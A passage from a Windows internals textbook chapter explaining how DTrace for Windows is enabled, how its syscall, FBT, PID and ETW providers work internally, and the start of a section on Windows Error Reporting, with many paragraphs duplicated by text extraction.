PROFILE Provides probes associated with a time-based interrupt firing every fixed, specified
time interval.
I
DTRACE Built-in provider is implicitly enabled in the DTrace engine.
The listed providers allow system administrators to dynamically trace almost every component of
the Windows operating system and user-mode applications.
Note There are big differences between the first version of DTrace for Windows, which
appeared in the May 2019 Update of Windows 10, and the current stable release (distributed
at the time of this writing in the May 2021 edition of Windows 10). One of the most notable
differences is that the first release required a kernel debugger to be set up to enable the FBT
provider. Furthermore, the ETW provider was not completely available in the first release
of DTrace.
EXPERIMENT: Enabling DTrace and listing the installed providers
In this experiment, you install and enable DTrace and list the providers that are available for
dynamically tracing various Windows components. You need a system with Windows 10 May
2020 Update (20H1) or later installed. As explained in the Microsoft documentation (https://docs.
microsoft.com/en-us/windows-hardware/drivers/devtest/dtrace), you should first enable DTrace
by opening an administrative command prompt and typing the following command (remember
to disable Bitlocker, if it is enabled):
bcdedit /set dtrace ON
After the command succeeds, you can download the DTrace package from https://www.
microsoft.com/download/details.aspx?id=100441 and install it. Restart your computer (or virtual
machine) and open an administrative command prompt (by typing CMD in the Cortana search
box and selecting Run As Administrator). Type the following commands (replacing provid-
ers.txt with another file name if desired):
cd /d “C:\Program Files\DTrace”
dtrace -l > providers.txt
Open the generated file (providers.txt in the example). If DTrace has been successfully
installed and enabled, a list of probes and providers (DTrace, syscall, and ETW) should be listed in
the output file. Probes are composed of an ID and a human-readable name. The human-readable
name is composed of four parts. Each part may or may not exist, depending on the provider. In
general, providers try to follow the convention as close as possible, but in some cases the mean-
ing of each part can be overloaded with something different:
I
Provider The name of the DTrace provider that is publishing the probe.
EXPERIMENT: Enabling DTrace and listing the installed providers
In this experiment, you install and enable DTrace and list the providers that are available for
dynamically tracing various Windows components. You need a system with Windows 10 May
2020 Update (20H1) or later installed. As explained in the Microsoft documentation (https://docs.
microsoft.com/en-us/windows-hardware/drivers/devtest/dtrace), you should first enable DTrace
by opening an administrative command prompt and typing the following command (remember
to disable Bitlocker, if it is enabled):
bcdedit /set dtrace ON
After the command succeeds, you can download the DTrace package from https://www.
microsoft.com/download/details.aspx?id=100441 and install it. Restart your computer (or virtual
machine) and open an administrative command prompt (by typing CMD in the Cortana search
box and selecting Run As Administrator). Type the following commands (replacing provid-
ers.txt with another file name if desired):
cd /d “C:\Program Files\DTrace”
dtrace -l > providers.txt
Open the generated file (providers.txt in the example). If DTrace has been successfully
installed and enabled, a list of probes and providers (DTrace, syscall, and ETW) should be listed in
the output file. Probes are composed of an ID and a human-readable name. The human-readable
name is composed of four parts. Each part may or may not exist, depending on the provider. In
general, providers try to follow the convention as close as possible, but in some cases the mean-
ing of each part can be overloaded with something different:
I
Provider
The name of the DTrace provider that is publishing the probe.
CHAPTER 10 Management, diagnostics, and tracing
527
I
Module If the probe corresponds to a specific program location, the name of the module
in which the probe is located. The module is used only for the PID (which is not shown in the
output produced by the dtrace -l command) and ETW provider.
I
Function If the probe corresponds to a specific program location, the name of the
program function in which the probe is located.
I
Name The final component of the probe name is a name that gives you some idea of the
probe’s semantic meaning, such as BEGIN or END.
When writing out the full human-readable name of a probe, all the parts of the name are
separated by colons. For example,
syscall::NtQuerySystemInformation:entry
specifies a probe on the NtQueryInformation function entry provided by the syscall provider.
Note that in this case, the module name is empty because the syscall provider does not specify
any name (all the syscalls are implicitly provided by the NT kernel).
The PID and FBT providers instead dynamically generate probes based on the process or
kernel image to which they are applied (and based on the currently available symbols). For ex-
ample, to correctly list the PID probes of a process, you should first get the process ID (PID) of the
process that you want to analyze (by simply opening the Task Manager and selecting the Details
property sheet; in this example, we are using Notepad, which in the test system has PID equal to
8020). Then execute DTrace with the following command:
dtrace -ln pid8020:::entry > pid_notepad.txt
This lists all the probes on function entries generated by the PID provider for the Notepad
process. The output will contain a lot of entries. Note that if you do not have the symbol store
path set, the output will not contain any probes generated by private functions. To restrict the
output, you can add the name of the module:
dtrace.exe -ln pid8020:kernelbase::entry >pid_kernelbase_notepad.txt
This yields all the PID probes generated for function entries of the kernelbase.dll module
mapped in Notepad. If you repeat the previous two commands after having set the symbol store
path with the following command,
set _NT_SYMBOL_PATH=srv*C:\symbols*http://msdl.microsoft.com/download/symbols
you will find that the output is much different (and also probes on private functions).
As explained in the “The Function Boundary Tracing (FBT) and Process (PID) providers” section
later in this chapter, the PID and FBT provider can be applied to any offset in a function’s code.
The following command returns all the offsets (always located at instruction boundary) in which
the PID provider can generate probes on the SetComputerNameW function of Kernelbase.dll:
dtrace.exe -ln pid8020:kernelbase:SetComputerNameW:
I
Module
If the probe corresponds to a specific program location, the name of the module
in which the probe is located. The module is used only for the PID (which is not shown in the
output produced by the dtrace -l command) and ETW provider.
I
Function
If the probe corresponds to a specific program location, the name of the
program function in which the probe is located.
I
Name
The final component of the probe name is a name that gives you some idea of the
probe’s semantic meaning, such as BEGIN or END.
When writing out the full human-readable name of a probe, all the parts of the name are
separated by colons. For example,
syscall::NtQuerySystemInformation:entry
specifies a probe on the NtQueryInformation function entry provided by the syscall provider.
Note that in this case, the module name is empty because the syscall provider does not specify
any name (all the syscalls are implicitly provided by the NT kernel).
The PID and FBT providers instead dynamically generate probes based on the process or
kernel image to which they are applied (and based on the currently available symbols). For ex-
ample, to correctly list the PID probes of a process, you should first get the process ID (PID) of the
process that you want to analyze (by simply opening the Task Manager and selecting the Details
property sheet; in this example, we are using Notepad, which in the test system has PID equal to
8020). Then execute DTrace with the following command:
dtrace -ln pid8020:::entry > pid_notepad.txt
This lists all the probes on function entries generated by the PID provider for the Notepad
process. The output will contain a lot of entries. Note that if you do not have the symbol store
path set, the output will not contain any probes generated by private functions. To restrict the
output, you can add the name of the module:
dtrace.exe -ln pid8020:kernelbase::entry >pid_kernelbase_notepad.txt
This yields all the PID probes generated for function entries of the kernelbase.dll module
mapped in Notepad. If you repeat the previous two commands after having set the symbol store
path with the following command,
set _NT_SYMBOL_PATH=srv*C:\symbols*http://msdl.microsoft.com/download/symbols
you will find that the output is much different (and also probes on private functions).
As explained in the “The Function Boundary Tracing (FBT) and Process (PID) providers” section
later in this chapter, the PID and FBT provider can be applied to any offset in a function’s code.
The following command returns all the offsets (always located at instruction boundary) in which
the PID provider can generate probes on the SetComputerNameW function of Kernelbase.dll:
SetComputerNameW function of Kernelbase.dll:
SetComputerNameW
dtrace.exe -ln pid8020:kernelbase:SetComputerNameW:
528
CHAPTER 10 Management, diagnostics, and tracing
Internal architecture
As explained in the “Enabling DTrace and listing the installed providers” experiment earlier in this chap-
ter, in Windows 10 May 2020 Update (20H1), some components of DTrace should be installed through
an external package. Future versions of Windows may integrate DTrace completely in the OS image.
Even though DTrace is deeply integrated in the operating system, it requires three external compo-
nents to work properly. These include both the NT-specific implementation and the original DTrace
code released under the free Common Development and Distribution License (CDDL), which is down-
loadable from https://github.com/microsoft/DTrace-on-Windows/tree/windows.
As shown in Figure 10-37, DTrace in Windows is composed of the following components:
I
DTrace.sys The DTrace extension driver is the main component that executes the actions as-
sociated with the probes and stores the results in a circular buffer that the user-mode applica-
tion obtains via IOCTLs.
I
DTrace.dll The module encapsulates LibDTrace, which is the DTrace user-mode engine.
It implements the Compiler for the D scripts, sends the IOCTLs to the DTrace driver, and is the
main consumer of the circular DTrace buffer (where the DTrace driver stores the output of
the actions).
I
DTrace.exe The entry point executable that dispatches all the possible commands (specified
through the command line) to the LibDTrace.
.d
DTrace.exe
Dbghelp.dll
Symbol
Store
LibDTrace
(DTrace.dll)
User Mode
Kernel Mode
Windload
NT Kernel
FBT
PID
SYSCALL
ETW
DTrace.sys
FIGURE 10-37 DTrace internal architecture.
To start the dynamic trace of the Windows kernel, a driver, or a user-mode application, the user
just invokes the DTrace.exe main executable specifying a command or an external D script. In both
cases, the command or the file contain one or more probes and additional actions expressed in the D
programming language. DTrace.exe parses the input command line and forwards the proper request
CHAPTER 10 Management, diagnostics, and tracing
529
to the LibDTrace (which is implemented in DTrace.dll). For example, when started for enabling one or
more probes, the DTrace executable calls the internal dtrace_program_fcompile function implemented
in LibDTrace, which compiles the D script and produces the DTrace Intermediate Format (DIF) bytecode
in an output buffer.
Note Describing the details of the DIF bytecode and how a D script (or D commands) is
compiled is outside the scope of this book. Interested readers can find detailed documenta-
tion in the OpenDTrace Specification book (released by the University of Cambridge), which
is available at https://www.cl.cam.ac.uk/techreports/UCAM-CL-TR-924.pdf.
While the D compiler is entirely implemented in user-mode in LibDTrace, to execute the compiled DIF
bytecode, the LibDtrace module just sends the DTRACEIOC_ENABLE IOCTL to the DTrace driver, which
implements the DIF virtual machine. The DIF virtual machine is able to evaluate each D clause expressed
in the bytecode and to execute optional actions associated with them. A limited set of actions are avail-
able, which are executed through native code and not interpreted via the D virtual machine.
As shown earlier in Figure 10-37, the DTrace extension driver implements all the providers. Before
discussing how the main providers work, it is necessary to present an introduction of the DTrace initial-
ization in the Windows OS.
DTrace initialization
The DTrace initialization starts in early boot stages, when the Windows loader is loading all the mod-
ules needed for the kernel to correctly start. One important part to load and validate is the API set file
(apisetschema.dll), which is a key component of the Windows system. (API Sets are described in Chapter
3 of part 1.) If the DTRACE_ENABLED BCD element is set in the boot entry (value 0x26000145, which
can be set through the dtrace readable name; see Chapter 12 for more details about BCD objects),
the Windows loader checks whether the dtrace.sys driver is present in the %SystemRoot%\System32\
Drivers path. If so, it builds a new API Set schema extension named ext-ms-win-ntos-trace-l1-1-0. The
schema targets the Dtrace.sys driver and is merged into the system API set schema (OslApiSetSchema).
Later in the boot process, when the NT kernel is starting its phase 1 of initialization, the TraceInitSystem
function is called to initialize the Dynamic Tracing subsystem. The API is imported in the NT kernel
through the ext-ms-win-ntos-trace-l1-1-0.dll API set schema. This implies that if DTrace is not enabled by
the Windows loader, the name resolution would fail, and the function will be basically a no op.
The TraceInitSystem has the important duty of calculating the content of the trace callouts array,
which contains the functions that will be called by the NT kernel when a trace probe fires. The array is
stored in the KiDynamicTraceCallouts global symbol, which will be later protected by Patchguard to
prevent malicious drivers from illegally redirecting the flow of execution of system routines. Finally,
through the TraceInitSystem function, the NT kernel sends to the DTrace driver another important ar-
ray, which contains private system interfaces used by the DTrace driver to apply the probes. (The array
is exposed in a trace extension context data structure.) This kind of initialization, where both the DTrace
driver and the NT kernel exchange private interfaces, is the main motivation why the DTrace driver is
called an extension driver.
530
CHAPTER 10 Management, diagnostics, and tracing
The Pnp manager later starts the DTrace driver, which is installed in the system as boot driver, and
calls its main entry point (DriverEntry). The routine registers the \Device\DTrace control device and its
symbolic link (\GLOBAL??\DTrace). It then initializes the internal DTrace state, creating the first DTrace
built-in provider. It finally registers all the available providers by calling the initialization function of
each of them. The initialization method depends on each provider and usually ends up calling the
internal dtrace_register function, which registers the provider with the DTrace framework. Another
common action in the provider initialization is to register a handler for the control device. User-mode
applications can communicate with DTrace and with a provider through the DTrace control device,
which exposes virtual files (handlers) to providers. For example, the user-mode LibDTrace communi-
cates directly with the PID provider by opening a handle to the \\.\DTrace\Fasttrap virtual file (handler).
The syscall provider
When the syscall provider gets activated, DTrace ends up calling the KeSetSystemServiceCallback
routine, with the goal of activating a callback for the system call specified in the probe. The routine is
exposed to the DTrace driver thanks to the NT system interfaces array. The latter is compiled by the
NT kernel at DTrace initialization time (see the previous section for more details) and encapsulated in
an extension context data structure internally called KiDynamicTraceContext. The first time that the
KeSetSystemServiceCallback is called, the routine has the important task of building the global service
trace table (KiSystemServiceTraceCallbackTable), which is an RB (red-black) tree containing descrip-
tors of all the available syscalls. Each descriptor includes a hash of the syscall’s name, its address, and
number of parameters and flags indicating whether the callback is enabled on entry or on exit. The NT
kernel includes a static list of syscalls exposed through the KiServicesTab internal array.
After the global service trace table has been filled, the KeSetSystemServiceCallback calculates the
hash of the syscall’s name specified by the probe and searches the hash in the RB tree. If there are
no matches, the probe has specified a wrong syscall name (so the function exits signaling an error).
Otherwise, the function modifies the enablement flags located in the found syscall’s descriptor and
increases the number of the enabled trace callbacks (which is stored in an internal variable).
When the first DTrace syscall callback is enabled, the NT kernel sets the syscall bit in the global
KiDynamicTraceMask bitmask. This is very important because it enables the system call handler
(KiSystemCall64) to invoke the global trace handlers. (System calls and system service dispatching have
been discussed extensively in Chapter 8.)
This design allows DTrace to coexist with the system call handling mechanism without having any
sort of performance penalty. If no DTrace syscall probe is active, the trace handlers are not invoked. A
trace handler can be called on entry and on exit of a system call. Its functionality is simple. It just scans
the global service trace table looking for the descriptor of the system call. When it finds the descrip-
tor, it checks whether the enablement flag is set and, if so, invokes the correct callout (contained in the
global dynamic trace callout array, KiDynamicTraceCallouts, as specified in the previous section). The
callout, which is implemented in the DTrace driver, uses the generic internal dtrace_probe function to
fire the syscall probe and execute the actions associated with it.
CHAPTER 10 Management, diagnostics, and tracing
531
The Function Boundary Tracing (FBT) and Process (PID) providers
Both the FBT and PID providers are similar because they allow a probe to be enabled on any function
entry and exit points (not necessarily a syscall). The target function can reside in the NT kernel or as
part of a driver (for these cases, the FBT provider is used), or it can reside in a user-mode module, which
should be executed by a process. (The PID provider can trace user-mode applications.) An FBT or PID
probe is activated in the system through breakpoint opcodes (INT 3 in x86, BRK in ARM64) that are
written directly in the target function’s code. This has the following important implications:
I
When a PID or FBT probe raises, DTrace should be able to re-execute the replaced instruction
before calling back the target function. To do this, DTrace uses an instruction emulator, which,
at the time of this writing, is compatible with the AMD64 and ARM64 architecture. The emula-
tor is implemented in the NT kernel and is normally invoked by the system exception handler
while dealing with a breakpoint exception.
I
DTrace needs a way to identify functions by name. The name of a function is never compiled in
the final binary (except for exported functions). DTrace uses multiple techniques to achieve this,
which will be discussed in the “DTrace type library” section later in this chapter.
I
A single function can exit (return) in multiple ways from different code branches. To identify the
exit points, a function graph analyzer is required to disassemble the function’s instructions and
find each exit point. Even though the original function graph analyzer was part of the Solaris
code, the Windows implementation of DTrace uses a new optimized version of it, which still lives
in the LibDTrace library (DTrace.dll). While user-mode functions are analyzed by the function
graph analyzer, DTrace uses the PDATA v2 unwind information to reliably find kernel-mode
function exit points (more information on function unwinds and exception dispatching is avail-
able in Chapter 8). If the kernel-mode module does not make use of PDATA v2 unwind informa-
tion, the FBT provider will not create any probes on function returns for it.
DTrace installs FBT or PID probes by calling the KeSetTracepoint function of the NT kernel exposed
through the NT System interfaces array. The function validates the parameters (the callback pointer
in particular) and, for kernel targets, verifies that the target function is located in an executable code
section of a known kernel-mode module. Similar to the syscall provider, a KI_TRACEPOINT_ENTRY data
structure is built and used for keeping track of the activated trace points. The data structure contains
the owning process, access mode, and target function address. It is inserted in a global hash table,
KiTpHashTable, which is allocated at the first time an FBT or PID probe gets activated. Finally, the single
instruction located in the target code is parsed (imported in the emulator) and replaced with a break-
point opcode. The trap bit in the global KiDynamicTraceMask bitmask is set.
For kernel-mode targets, the breakpoint replacement can happen only when VBS (Virtualization
Based Security) is enabled. The MmWriteSystemImageTracepoint routine locates the loader data table
entry associated with the target function and invokes the SECURESERVICE_SET_TRACEPOINT secure
call. The Secure Kernel is the only entity able to collaborate with HyperGuard and thus to render the
breakpoint application a legit code modification. As explained in Chapter 7 of Part 1, Kernel Patch
protection (also known as Patchguard) prevents any code modification from being performed on the
NT kernel and some essential kernel drivers. If VBS is not enabled on the system, and a debugger is not
attached, an error code is returned, and the probe application fails. If a kernel debugger is attached,
532
CHAPTER 10 Management, diagnostics, and tracing
the breakpoint opcode is applied by the NT kernel through the MmDbgCopyMemory function.
(Patchguard is not enabled on debugged systems.)
When called for debugger exceptions, which may be caused by a DTrace’s FTB or PID probe firing,
the system exception handler (KiDispatchException) checks whether the “trap” bit is set in the global
KiDynamicTraceMask bitmask. If it is, the exception handler calls the KiTpHandleTrap function, which
searches into the KiTpHashTable to determine whether the exception occurred thanks to a registered
FTB or PID probe firing. For user-mode probes, the function checks whether the process context is
the expected one. If it is, or if the probe is a kernel-mode one, the function directly invokes the DTrace
callback, FbtpCallback, which executes the actions associated with the probe. When the callback
completes, the handler invokes the emulator, which emulates the original first instruction of the target
function before transferring the execution context to it.
EXPERIMENT: Tracing dynamic memory
In this experiment, you dynamically trace the dynamic memory applied to a VM. Using Hyper-V
Manager, you need to create a generation 2 Virtual Machine and apply a minimum of 768 MB
and an unlimited maximum amount of dynamic memory (more information on dynamic memory
and Hyper-V is available in Chapter 9). The VM should have the May 2019 (19H1) or May 2020
(20H1) Update of Windows 10 or later installed as well as the DTrace package (which should be
enabled as explained in the “Enabling DTrace and listing the installed providers” experiment from
earlier in this chapter).
The dynamic_memory.d script, which can be found in this book’s downloadable resources,
needs to be copied in the DTrace directory and started by typing the following commands in an
administrative command prompt window:
cd /d "c:\Program Files\DTrace"
dtrace.exe -s dynamic_memory.d
With only the preceding commands, DTrace will refuse to compile the script because of an
error similar to the following:
dtrace: failed to compile script dynamic_memory.d: line 62: probe description fbt:nt:MiRem
ovePhysicalMemory:entry does not match any probes
This is because, in standard configurations, the path of the symbols store is not set. The script
attaches the FBT provider on two OS functions: MmAddPhysicalMemory, which is exported from
the NT kernel binary, and MiRemovePhysicalMemory, which is not exported or published in the
public WDK. For the latter, the FBT provider has no way to calculate its address in the system.
DTrace can obtain types and symbol information from different sources, as explained in the
“DTrace type library” section later in this chapter. To allow the FBT provider to correctly work with
internal OS functions, you should set the Symbol Store’s path to point to the Microsoft public
symbol server, using the following command:
set _NT_SYMBOL_PATH=srv*C:\symbols*http://msdl.microsoft.com/download/symbols
EXPERIMENT: Tracing dynamic memory
In this experiment, you dynamically trace the dynamic memory applied to a VM. Using Hyper-V
Manager, you need to create a generation 2 Virtual Machine and apply a minimum of 768 MB
and an unlimited maximum amount of dynamic memory (more information on dynamic memory
and Hyper-V is available in Chapter 9). The VM should have the May 2019 (19H1) or May 2020
(20H1) Update of Windows 10 or later installed as well as the DTrace package (which should be
enabled as explained in the “Enabling DTrace and listing the installed providers” experiment from
earlier in this chapter).
The dynamic_memory.d script, which can be found in this book’s downloadable resources,
needs to be copied in the DTrace directory and started by typing the following commands in an
administrative command prompt window:
cd /d "c:\Program Files\DTrace"
dtrace.exe -s dynamic_memory.d
With only the preceding commands, DTrace will refuse to compile the script because of an
error similar to the following:
dtrace: failed to compile script dynamic_memory.d: line 62: probe description fbt:nt:MiRem
ovePhysicalMemory:entry does not match any probes
This is because, in standard configurations, the path of the symbols store is not set. The script
attaches the FBT provider on two OS functions: MmAddPhysicalMemory, which is exported from
MmAddPhysicalMemory, which is exported from
MmAddPhysicalMemory
the NT kernel binary, and MiRemovePhysicalMemory, which is not exported or published in the
MiRemovePhysicalMemory, which is not exported or published in the
MiRemovePhysicalMemory
public WDK. For the latter, the FBT provider has no way to calculate its address in the system.
DTrace can obtain types and symbol information from different sources, as explained in the
“DTrace type library” section later in this chapter. To allow the FBT provider to correctly work with
internal OS functions, you should set the Symbol Store’s path to point to the Microsoft public
symbol server, using the following command:
set _NT_SYMBOL_PATH=srv*C:\symbols*http://msdl.microsoft.com/download/symbols
CHAPTER 10 Management, diagnostics, and tracing
533
After the symbol store’s path is set, if you restart DTrace targeting the dynamic_memory.d
script, it should be able to correctly compile it and show the following output:
The Dynamic Memory script has begun.
Now you should simulate a high-memory pressure scenario. You can do this in multiple
ways—for example, by starting your favorite browser and opening a lot of tabs, by starting a 3D
game, or by simply using the TestLimit tool with the -d command switch, which forces the system
to contiguously allocate memory and write to it until all the resources are exhausted. The VM
worker process in the root partition should detect the scenario and inject new memory in the
child VM. This would be detected by DTrace:
Physical memory addition request intercepted. Start physical address 0x00112C00, Number of
pages: 0x00000400.
Addition of 1024 memory pages starting at PFN 0x00112C00 succeeded!
In a similar way, if you close all the applications in the guest VM and you recreate a high-
memory pressure scenario in your host system, the script would be able to intercept dynamic
memory’s removal requests:
Physical memory removal request intercepted. Start physical address 0x00132000, Number of
pages: 0x00000200.
Removal of 512 memory pages starting at PFN 0x00132000 succeeded!
After interrupting DTrace using Ctrl+C, the script prints out some statistics information:
Dynamic Memory script ended.
Numbers of Hot Additions: 217
Numbers of Hot Removals: 1602
Since starts the system has gained 0x00017A00 pages (378 MB).
If you open the dynamic_memory.d script using Notepad, you will find that it installs a total of
six probes (four FBT and two built-in) and performs logging and counting actions. For example,
fbt:nt:MmAddPhysicalMemory:return
/ self->pStartingAddress != 0 /
installs a probe on the exit points of the MmAddPhysicalMemory function only if the starting
physical address obtained at function entry point is not 0. More information on the D program-
ming language applied to DTrace is available in the The illumos Dynamic Tracing Guide book,
which is freely accessible at http://dtrace.org/guide/preface.html.
The ETW provider
DTrace supports both an ETW provider, which allows probes to fire when certain ETW events are gen-
erated by particular providers, and the etw_trace action, which allows DTrace scripts to generate new
customized TraceLogging ETW events. The etw_trace action is implemented in LibDTrace, which uses
TraceLogging APIs to dynamically register a new ETW provider and generate events associated with it.
More information on ETW has been presented in the “Event Tracing for Windows (ETW)” section previ-
ously in this chapter.
After the symbol store’s path is set, if you restart DTrace targeting the dynamic_memory.d
script, it should be able to correctly compile it and show the following output:
The Dynamic Memory script has begun.
Now you should simulate a high-memory pressure scenario. You can do this in multiple
ways—for example, by starting your favorite browser and opening a lot of tabs, by starting a 3D
game, or by simply using the TestLimit tool with the -d command switch, which forces the system
to contiguously allocate memory and write to it until all the resources are exhausted. The VM
worker process in the root partition should detect the scenario and inject new memory in the
child VM. This would be detected by DTrace:
Physical memory addition request intercepted. Start physical address 0x00112C00, Number of
pages: 0x00000400.
Addition of 1024 memory pages starting at PFN 0x00112C00 succeeded!
In a similar way, if you close all the applications in the guest VM and you recreate a high-
memory pressure scenario in your host system, the script would be able to intercept dynamic
memory’s removal requests:
Physical memory removal request intercepted. Start physical address 0x00132000, Number of
pages: 0x00000200.
Removal of 512 memory pages starting at PFN 0x00132000 succeeded!
After interrupting DTrace using Ctrl+C, the script prints out some statistics information:
Dynamic Memory script ended.
Numbers of Hot Additions: 217
Numbers of Hot Removals: 1602
Since starts the system has gained 0x00017A00 pages (378 MB).
If you open the dynamic_memory.d script using Notepad, you will find that it installs a total of
six probes (four FBT and two built-in) and performs logging and counting actions. For example,
fbt:nt:MmAddPhysicalMemory:return
/ self->pStartingAddress != 0 /
installs a probe on the exit points of the MmAddPhysicalMemory function only if the starting
MmAddPhysicalMemory function only if the starting
MmAddPhysicalMemory
physical address obtained at function entry point is not 0. More information on the D program-
ming language applied to DTrace is available in the The illumos Dynamic Tracing Guide book,
which is freely accessible at http://dtrace.org/guide/preface.html.
534
CHAPTER 10 Management, diagnostics, and tracing
The ETW provider is implemented in the DTrace driver. When the Trace engine is initialized by the
Pnp manager, it registers all providers with the DTrace engine. At registration time, the ETW provider
configures an ETW session called DTraceLoggingSession, which is set to write events in a circular buf-
fer. When DTrace is started from the command line, it sends an IOCTL to DTrace driver. The IOCTL
handler calls the provide function of each provider; the DtEtwpCreate internal function invokes the
NtTraceControl API with the EtwEnumTraceGuidList function code. This allows DTrace to enumerate all
the ETW providers registered in the system and to create a probe for each of them. (dtrace -l is also
able to display ETW probes.)
When a D script targeting the ETW provider is compiled and executed, the internal DtEtwEnable
routine gets called with the goal of enabling one or more ETW probes. The logging session configured
at registration time is started, if it’s not already running. Through the trace extension context (which,
as previously discussed, contains private system interfaces), DTrace is able to register a kernel-mode
callback called every time a new event is logged in the DTrace logging session. The first time that the
session is started, there are no providers associated with it. Similar to the syscall and FBT provider, for
each probe DTrace creates a tracking data structure and inserts it in a global RB tree (DtEtwpProbeTree)
representing all the enabled ETW probes. The tracking data structure is important because it rep-
resents the link between the ETW provider and the probes associated with it. DTrace calculates the
correct enablement level and keyword bitmask for the provider (see the “Provider Enablement” section
previously in this chapter for more details) and enables the provider in the session by invoking the
NtTraceControl API.
When an event is generated, the ETW subsystem calls the callback routine, which searches into
the global ETW probe tree the correct context data structure representing the probe. When found,
DTrace can fire the probe (still using the internal dtrace_probe function) and execute all the actions
associated with it.
DTrace type library
DTrace works with types. System administrators are able to inspect internal operating system data
structures and use them in D clauses to describe actions associated with probes. DTrace also supports
supplemental data types compared to the ones supported by the standard D programming language.
To be able to work with complex OS-dependent data types and allow the FBT and PID providers to set
probes on internal OS and application functions, DTrace obtains information from different sources:
I
Function names, signatures, and data types are initially extracted from information embedded
in the executable binary (which adheres to the Portable Executable file format), like from the
export table and debug information.
I
For the original DTrace project, the Solaris operating system included support for Compact C
Type Format (CTF) in its executable binary files (which adhere to the Executable and Linkable
Format - ELF). This allowed the OS to store the debug information needed by DTrace to run di-
rectly into its modules (the debug information can also be stored using the deflate compression
format). The Windows version of DTrace still supports a partial CTF, which has been added as a
resource section of the LibDTrace library (Dtrace.dll). CTF in the LibDTrace library stores the type
CHAPTER 10 Management, diagnostics, and tracing
535
information contained in the public WDK (Windows Driver Kit) and SDK (Software Development
Kit) and allows DTrace to work with basic OS data types without requiring any symbol file.
I
Most of the private types and internal OS function signatures are obtained from PDB symbols.
Public PDB symbols for the majority of the operating system’s modules are downloadable
from the Microsoft Symbol Server. (These symbols are the same as those used by the Windows
Debugger.) The symbols are deeply used by the FBT provider to correctly identify internal OS
functions and by DTrace to be able to retrieve the correct type of parameters for each syscall
and function.
The DTrace symbol server
DTrace includes an autonomous symbol server that can download PDB symbols from the Microsoft pub-
lic Symbol store and render them available to the DTrace subsystem. The symbol server is implemented
mainly in LibDTrace and can be queried by the DTrace driver using the Inverted call model. As part of the
providers’ registration, the DTrace driver registers a SymServer pseudo-provider. The latter is not a real
provider but just a shortcut for allowing the symsrv handler to the DTrace control device to be registered.
When DTrace is started from the command line, the LibDTrace library starts the symbols server
by opening a handle to the \\.\dtrace\symsrv control device (using the standard CreateFile API). The
request is processed by the DTrace driver through the Symbol server IRP handler, which registers the
user-mode process, adding it in an internal list of symbols server processes. LibDTrace then starts a
new thread, which sends a dummy IOCTL to the DTrace symbol server device and waits indefinitely for
a reply from the driver. The driver marks the IRP as pending and completes it only when a provider (or
the DTrace subsystem), requires new symbols to be parsed.
Every time the driver completes the pending IRP, the DTrace symbols server thread wakes up and
uses services exposed by the Windows Image Helper library (Dbghelp.dll) to correctly download and
parse the required symbol. The driver then waits for a new dummy IOCTL to be sent from the symbols
thread. This time the new IOCTL will contain the results of the symbol parsing process. The user-mode
thread wakes up again only when the DTrace driver requires it.
Windows Error Reporting (WER)
Windows Error Reporting (WER) is a sophisticated mechanism that automates the submission of both
user-mode process crashes as well as kernel-mode system crashes. Multiple system components have
been designed for supporting reports generated when a user-mode process, protected process, trust-
let, or the kernel crashes.
Windows 10, unlike from its predecessors, does not include a graphical dialog box in which the
user can configure the details that Windows Error Reporting acquires and sends to Microsoft (or to
an internal server configured by the system administrator) when an application crashes. As shown in
Figure 10-38, in Windows 10, the Security and Maintenance applet of the Control Panel can show the
user a history of the reports generated by Windows Error Reporting when an application (or the kernel)
crashes. The applet can show also some basic information contained in the report.
536
CHAPTER 10 Management, diagnostics, and tracing
FIGURE 10-38 The Reliability monitor of the Security and Maintenance applet of the Control Panel.
Windows Error Reporting is implemented in multiple components of the OS, mainly because it
needs to deal with different kind of crashes:
I
The Windows Error Reporting Service (WerSvc.dll) is the main service that manages the creation
and sending of reports when a user-mode process, protected process, or trustlet crashes.
I
The Windows Fault Reporting and Secure Fault Reporting (WerFault.exe and WerFaultSecure.
exe) are mainly used to acquire a snapshot of the crashing application and start the genera-
tion and sending of a report to the Microsoft Online Crash Analysis site (or, if configured, to an
internal error reporting server).
I
The actual generation and transmission of the report is performed by the Windows Error
Reporting Dll (Wer.dll). The library includes all the functions used internally by the WER engine
and also some exported API that the applications can use to interact with Windows Error
Reporting (documented at https://docs.microsoft.com/en-us/windows/win32/api/_wer/). Note
that some WER APIs are also implemented in Kernelbase.dll and Faultrep.dll.
I
The Windows User Mode Crash Reporting DLL (Faultrep.dll) contains common WER stub code
that is used by system modules (Kernel32.dll, WER service, and so on) when a user-mode appli-
cation crashes or hangs. It includes services for creating a crash signature and reports a hang to
the WER service, managing the correct security context for the report creation and transmission
(which includes the creation of the WerFault executable under the correct security token).
CHAPTER 10 Management, diagnostics, and tracing
537
I
The Windows Error Reporting Dump Encoding Library (Werenc.dll) is used by the Secure Fault
Reporting to encrypt the dump files generated when a trustlet crashes.
I
The Windows Error Reporting Kernel Driver (WerKernel.sys) is a kernel library that exports
functions to capture a live kernel memory dump and submit the report to the Microsoft Online
Crash Analysis site. Furthermore, the driver includes APIs for creating and submitting reports for
user-mode faults from a kernel-mode driver.
Describing the entire architecture of WER is outside the scope of this book. In this section, we mainly
describe error reporting for user-mode applications and the NT kernel (or kernel-driver) crashes.
User applications crashes
As discussed in Chapter 3 of Part 1, all the user-mode threads in Windows start with the RtlUserThreadStart
function located in Ntdll. The function does nothing more than calling the real thread start routine
under a structured exception handler. (Structured exception handling is described in Chapter 8.)
The handler protecting the real start routine is internally called Unhandled Exception Handler
because it is the last one that can manage an exception happening in a user-mode thread (when the
thread does not already handle it). The handler, if executed, usually terminates the process with the
NtTerminateProcess API. The entity that decides whether to execute the handler is the unhandled
exception filter, RtlpThreadExceptionFilter. Noteworthy is that the unhandled exception filter and
handler are executed only under abnormal conditions; normally, applications should manage their
own exceptions with inner exception handlers.
When a Win32 process is starting, the Windows loader maps the needed imported libraries.
The kernelbase initialization routine installs its own unhandled exception filter for the process, the
UnhandledExceptionFilter routine. When a fatal unhandled exception happens in a process’s thread,
the filter is called to determine how to process the exception. The kernelbase unhandled exception
filter builds context information (such as the current value of the machine’s registers and stack, the
faulting process ID, and thread ID) and processes the exception:
I
If a debugger is attached to the process, the filter lets the exception happen (by returning
CONTINUE_SEARCH). In this way, the debugger can break and see the exception.
I
If the process is a trustlet, the filter stops any processing and invokes the kernel to start the
Secure Fault Reporting (WerFaultSecure.exe).
I
The filter calls the CRT unhandled exception routine (if it exists) and, in case the latter does not
know how to handle the exception, it calls the internal WerpReportFault function, which con-
nects to the WER service.
Before opening the ALPC connection, WerpReportFault should wake up the WER service and
prepare an inheritable shared memory section, where it stores all the context information previously
